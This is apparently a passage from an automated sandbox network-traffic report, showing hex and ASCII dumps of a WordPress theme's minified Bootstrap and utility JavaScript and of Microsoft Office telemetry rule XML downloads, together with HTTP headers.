                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6c 73 65 20 69 66 28 61 26 26 74 26 26 75 29 72 65 74 75 72 6e 20 6e 5b 74 3d 61 28 6e 2c 72 29 5d 3d 3d 3d 72 3f 74 3a 2d 31 3b 69 66 28 72 21 3d 72 29 72 65 74 75 72 6e 20 30 3c 3d 28 74 3d 69 28 66 2e 63 61 6c 6c 28 6e 2c 65 2c 75 29 2c 66 6e 29 29 3f 74 2b 65 3a 2d 31 3b 66 6f 72 28 74 3d 30 3c 6f 3f 65 3a 75 2d 31 3b 30 3c 3d 74 26 26 74 3c 75 3b 74 2b 3d 6f 29 69 66 28 6e 5b 74 5d 3d 3d 3d 72 29 72 65 74 75 72 6e 20 74 3b 72 65 74 75 72 6e 2d 31 7d 7d 76 61 72 20 61 72 3d 69 72 28 31 2c 65 72 2c 6f 72 29 2c 66 72 3d 69 72 28 2d 31 2c 75 72 29 3b 66 75 6e 63 74 69 6f 6e 20 63 72 28 6e 2c 72 2c 74 29 7b 72 3d 28 45 28 6e 29 3f 65 72 3a 72 72 29 28 6e 2c 72 2c 74 29 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 2d 31 21 3d 3d 72 29 72 65 74 75 72 6e
                                                                                                                                                                                                                              Data Ascii: lse if(a&&t&&u)return n[t=a(n,r)]===r?t:-1;if(r!=r)return 0<=(t=i(f.call(n,e,u),fn))?t+e:-1;for(t=0<o?e:u-1;0<=t&&t<u;t+=o)if(n[t]===r)return t;return-1}}var ar=ir(1,er,or),fr=ir(-1,ur);function cr(n,r,t){r=(E(n)?er:rr)(n,r,t);if(void 0!==r&&-1!==r)return
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6e 20 6e 75 6c 6c 3d 3d 72 3f 72 3a 72 2e 61 70 70 6c 79 28 6e 2c 65 29 7d 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 64 72 28 6e 2c 72 29 7b 72 65 74 75 72 6e 20 49 28 6e 2c 6b 6e 28 72 29 29 7d 66 75 6e 63 74 69 6f 6e 20 67 72 28 6e 2c 65 2c 72 29 7b 76 61 72 20 74 2c 75 2c 6f 3d 2d 31 2f 30 2c 69 3d 2d 31 2f 30 3b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 6e 5b 30 5d 26 26 6e 75 6c 6c 21 3d 6e 29 66 6f 72 28 76 61 72 20 61 3d 30 2c 66 3d 28 6e 3d 45 28 6e 29 3f 6e 3a 6a 28 6e 29 29 2e 6c 65 6e 67 74 68 3b 61 3c 66 3b 61 2b 2b 29 6e 75 6c 6c 21 3d 28 74 3d 6e 5b 61 5d 29 26 26 6f 3c 74 26 26 28 6f 3d 74 29 3b 65 6c 73 65 20 65 3d 53 28 65 2c 72 29 2c 4e
                                                                                                                                                                                                                              Data Ascii: n null==r?r:r.apply(n,e)})});function dr(n,r){return I(n,kn(r))}function gr(n,e,r){var t,u,o=-1/0,i=-1/0;if(null==e||"number"==typeof e&&"object"!=typeof n[0]&&null!=n)for(var a=0,f=(n=E(n)?n:j(n)).length;a<f;a++)null!=(t=n[a])&&o<t&&(o=t);else e=S(e,r),N
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 72 2c 74 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 30 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 6e 2e 6c 65 6e 67 74 68 2d 28 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 31 3a 72 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 72 28 6e 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 2e 6c 65 6e 67 74 68 3c 31 3f 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 76 6f 69 64 20 30 3a 5b 5d 3a 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 6e 5b 30 5d 3a 45 72 28 6e 2c 6e 2e 6c 65 6e 67 74 68 2d 72 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 6e 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 31 3a 72 29 7d 76 61 72 20 4e 72 3d 6c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 42 28 72 2c 21 30 2c 21 30 29 2c
                                                                                                                                                                                                                              Data Ascii: r,t){return f.call(n,0,Math.max(0,n.length-(null==r||t?1:r)))}function Br(n,r,t){return null==n||n.length<1?null==r||t?void 0:[]:null==r||t?n[0]:Er(n,n.length-r)}function R(n,r,t){return f.call(n,null==r||t?1:r)}var Nr=l(function(n,r){return r=B(r,!0,!0),


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              88192.168.2.649817141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:08 UTC669OUTGET /wp-content/themes/socialdriver/js/functions-spb.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:08 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:03:37 GMT
                                                                                                                                                                                                                              ETag: W/"66f569b9-13105a"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614819
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5dc2d602cca-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC875INData Raw: 37 64 63 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 65 28 65 78 70 6f 72 74 73 2c 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 2c 72 65 71 75 69 72 65 28 22 70 6f 70 70 65 72 2e 6a 73 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 28 74 3d 74 7c 7c 73 65 6c 66 29 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69
                                                                                                                                                                                                                              Data Ascii: 7dc3!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(thi
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 69 7d 29 7d 72 65 74 75 72 6e 20 6e 7d 63 3d 63 26 26 63 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 64 65 66 61 75 6c 74 22 29 3f 63 2e 64 65 66 61 75 6c 74 3a 63 2c 73 3d 73 26 26 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 64 65 66 61 75 6c 74 22 29 3f 73 2e 64 65 66 61 75 6c 74 3a 73 3b 76 61 72 20 7a 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 76 61 72 20 64 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 2b 3d 7e 7e 28 31 65 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2c 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                              Data Ascii: nfigurable:!0,writable:!0}):e[t]=i})}return n}c=c&&c.hasOwnProperty("default")?c.default:c,s=s&&s.hasOwnProperty("default")?s.default:s;var z="transitionend";var d={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 3f 74 3a 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 64 2e 66 69 6e 64 53 68 61 64 6f 77 52 6f 6f 74 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3a 6e 75 6c 6c 3a 28 74 3d 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 29 69 6e 73 74 61 6e 63 65 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 3f 74 3a 6e 75 6c 6c 3a 6e 75 6c 6c 7d 7d 2c 51 3d 28 63 2e 66 6e 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 69 3d 21 31 3b 72 65 74 75 72 6e 20 63 28 74 68 69 73 29 2e 6f 6e 65 28 64 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 7c
                                                                                                                                                                                                                              Data Ascii: of ShadowRoot?t:t.parentNode?d.findShadowRoot(t.parentNode):null:(t=t.getRootNode())instanceof ShadowRoot?t:null:null}},Q=(c.fn.emulateTransitionEnd=function(t){var e=this,i=!1;return c(this).one(d.TRANSITION_END,function(){i=!0}),setTimeout(function(){i|
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 63 28 74 68 69 73 29 2c 65 3d 74 2e 64 61 74 61 28 57 29 3b 65 7c 7c 28 65 3d 6e 65 77 20 61 28 74 68 69 73 29 2c 74 2e 64 61 74 61 28 57 2c 65 29 29 2c 22 63 6c 6f 73 65 22 3d 3d 3d 69 26 26 65 5b 69 5d 28 74 68 69 73 29 7d 29 7d 2c 61 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 26 26 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 63 6c 6f 73 65 28 74 68 69 73 29 7d 7d 2c 65 28 61 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 33 2e 31 22 7d 7d 5d 29
                                                                                                                                                                                                                              Data Ascii: return this.each(function(){var t=c(this),e=t.data(W);e||(e=new a(this),t.data(W,e)),"close"===i&&e[i](this)})},a._handleDismiss=function(e){return function(t){t&&t.preventDefault(),e.close(this)}},e(a,null,[{key:"VERSION",get:function(){return"4.3.1"}}])
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 65 6e 74 2c 42 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 71 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 63 28 74 68 69 73 29 2e 64 61 74 61 28 42 29 3b 74 7c 7c 28 74 3d 6e 65 77 20 71 28 74 68 69 73 29 2c 63 28 74 68 69 73 29 2e 64 61 74 61 28 42 2c 74 29 29 2c 22 74 6f 67 67 6c 65 22 3d 3d 3d 65 26 26 74 5b 65 5d 28 29 7d 29 7d 2c 65 28 71 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 33 2e 31 22 7d 7d 5d 29 2c 71 29 3b 66 75 6e 63 74 69 6f 6e 20 71 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65
                                                                                                                                                                                                                              Data Ascii: ent,B),this._element=null},q._jQueryInterface=function(e){return this.each(function(){var t=c(this).data(B);t||(t=new q(this),c(this).data(B,t)),"toggle"===e&&t[e]()})},e(q,null,[{key:"VERSION",get:function(){return"4.3.1"}}]),q);function q(t){this._eleme
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 4a 29 7d 2c 69 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 29 26 26 74 68 69 73 2e 6e 65 78 74 28 29 7d 2c 69 2e 70 72 65 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 74 74 29 7d 2c 69 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c
                                                                                                                                                                                                                              Data Ascii: ng||this._slide(J)},i.nextWhenVisible=function(){!document.hidden&&c(this._element).is(":visible")&&"hidden"!==c(this._element).css("visibility")&&this.next()},i.prev=function(){this._isSliding||this._slide(tt)},i.pause=function(t){t||(this._isPaused=!0),
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 74 6f 75 63 68 44 65 6c 74 61 58 29 3b 74 3c 3d 34 30 7c 7c 28 30 3c 28 74 3d 74 2f 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 29 26 26 74 68 69 73 2e 70 72 65 76 28 29 2c 74 3c 30 26 26 74 68 69 73 2e 6e 65 78 74 28 29 29 7d 2c 69 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 70 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29
                                                                                                                                                                                                                              Data Ascii: touchDeltaX);t<=40||(0<(t=t/this.touchDeltaX)&&this.prev(),t<0&&this.next())},i._addEventListeners=function(){var e=this;this._config.keyboard&&c(this._element).on(p.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&c(this._element)
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 68 3f 69 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 30 3a 69 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 2d 69 2e 74 6f 75 63 68 53 74 61 72 74 58 7d 29 2c 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 70 2e 54 4f 55 43 48 45 4e 44 2c 65 29 29 29 7d 2c 69 2e 5f 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33
                                                                                                                                                                                                                              Data Ascii: h?i.touchDeltaX=0:i.touchDeltaX=t.originalEvent.touches[0].clientX-i.touchStartX}),c(this._element).on(p.TOUCHEND,e)))},i._keydown=function(t){if(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 3
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 22 6c 65 66 74 22 29 3a 28 69 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 6e 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 22 72 69 67 68 74 22 29 3b 6c 26 26 63 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 66 29 3f 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3a 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 74 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 61 26 26 6c 26 26 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 30 2c 68 26 26 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 5f 73 65 74 41 63 74 69 76 65 49 6e 64 69 63 61 74 6f 72 45 6c 65 6d 65 6e 74 28 6c 29 2c 73 3d 63
                                                                                                                                                                                                                              Data Ascii: arousel-item-next","left"):(i="carousel-item-right",n="carousel-item-prev","right");l&&c(l).hasClass(f)?this._isSliding=!1:!this._triggerSlideEvent(l,t).isDefaultPrevented()&&a&&l&&(this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorElement(l),s=c
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 69 2c 6e 3d 64 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 6e 26 26 28 6e 3d 63 28 6e 29 5b 30 5d 29 26 26 63 28 6e 29 2e 68 61 73 43 6c 61 73 73 28 22 63 61 72 6f 75 73 65 6c 22 29 26 26 28 65 3d 6f 28 7b 7d 2c 63 28 6e 29 2e 64 61 74 61 28 29 2c 63 28 74 68 69 73 29 2e 64 61 74 61 28 29 29 2c 28 69 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 22 29 29 26 26 28 65 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6d 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 63 28 6e 29 2c 65 29 2c 69 26 26 63 28 6e 29 2e 64 61 74 61 28 56 29 2e 74 6f 28
                                                                                                                                                                                                                              Data Ascii: ApiClickHandler=function(t){var e,i,n=d.getSelectorFromElement(this);n&&(n=c(n)[0])&&c(n).hasClass("carousel")&&(e=o({},c(n).data(),c(this).data()),(i=this.getAttribute("data-slide-to"))&&(e.interval=!1),m._jQueryInterface.call(c(n),e),i&&c(n).data(V).to(


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              89192.168.2.64982113.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                              x-ms-request-id: f6d2fe15-801e-007b-74f2-21e7ab000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180409Z-r1755647c66f2zlraraf0y5hrs000000071000000000866a
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              90192.168.2.64982013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 425
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                              x-ms-request-id: 62ae5dc2-001e-0079-2456-2312e8000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180409Z-17fbfdc98bbrx2rj4asdpg8sbs00000002200000000069sa
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              91192.168.2.64982213.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
